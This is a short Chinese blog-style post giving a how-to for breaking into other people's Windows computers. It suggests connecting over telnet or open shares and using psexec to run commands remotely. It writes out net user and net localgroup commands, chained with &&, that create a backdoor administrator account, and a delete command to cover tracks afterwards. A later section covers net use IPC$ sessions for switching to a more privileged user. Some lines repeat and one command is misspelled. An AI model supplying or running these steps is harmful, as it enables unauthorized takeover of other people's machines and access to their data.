声明:部分资料采自:http://don-pan.cwf.blog.163.com/blog/static/1182876420076211016404/
如果对方开启了23端口,可以用telnet命令连接对方电脑。
如果对方共享了资料。通过访问共享可以查看用户的资料了。
用入侵软件(如psexec.exe)进入别人的电脑,进入之后,DOS命令就会映射为对方的电脑了,这时你所执行的命令都是运行在他的电脑上。此时如果想要在他的电脑上创建一个用户,并提权为系统管理员,那么岂不是乐翻天了。
添加用户:netuser (user) (password) /add
提升为管理员:netlocalgroup administrators (user) /add
这两条语句也可以用一个&&连接起来一起同时使用完成两项任务。
net user (user) (password) /add &&net localgroup administrators (user) /add
得到对方的用户名和密码之后:就可以直接访问他的共享甚至进行一些其他的操作就可以完全控制对方的电脑了。
使用完毕对方的电脑,使用net user (user) /del就可以删除当前的用户了。
如果对方开启了23端口,可以用telnet命令连接对方电脑。
如果对方共享了资料。通过访问共享可以查看用户的资料了。
我遇到了这样一种情况:之前访问一台电脑的共享时,存储了用户名和密码。后来再访问它的共享时,直接就登录进去了,不需要输入验证。但是我想换一个用户登录,该用户有更高的权限。现在要怎么办?
解决如下:
一、先用net use命令查看当前网络连接。
二、找到你对应的那台电脑,假如连接显示是:\\10.9.20.60\IPC$
三、用net use \\10.9.20.60\IPC$ /del删除当前连接。然后再访问共享,是不是要输入用户了???
四、也可以用命令行建立起连接,然后直接访问,也不用输入用户名和密码了。命令格式如下:
net use \\10.9.20.60\IPC$ (password)/user:(user)连接建立成功之后,直接访问共享就会成功了。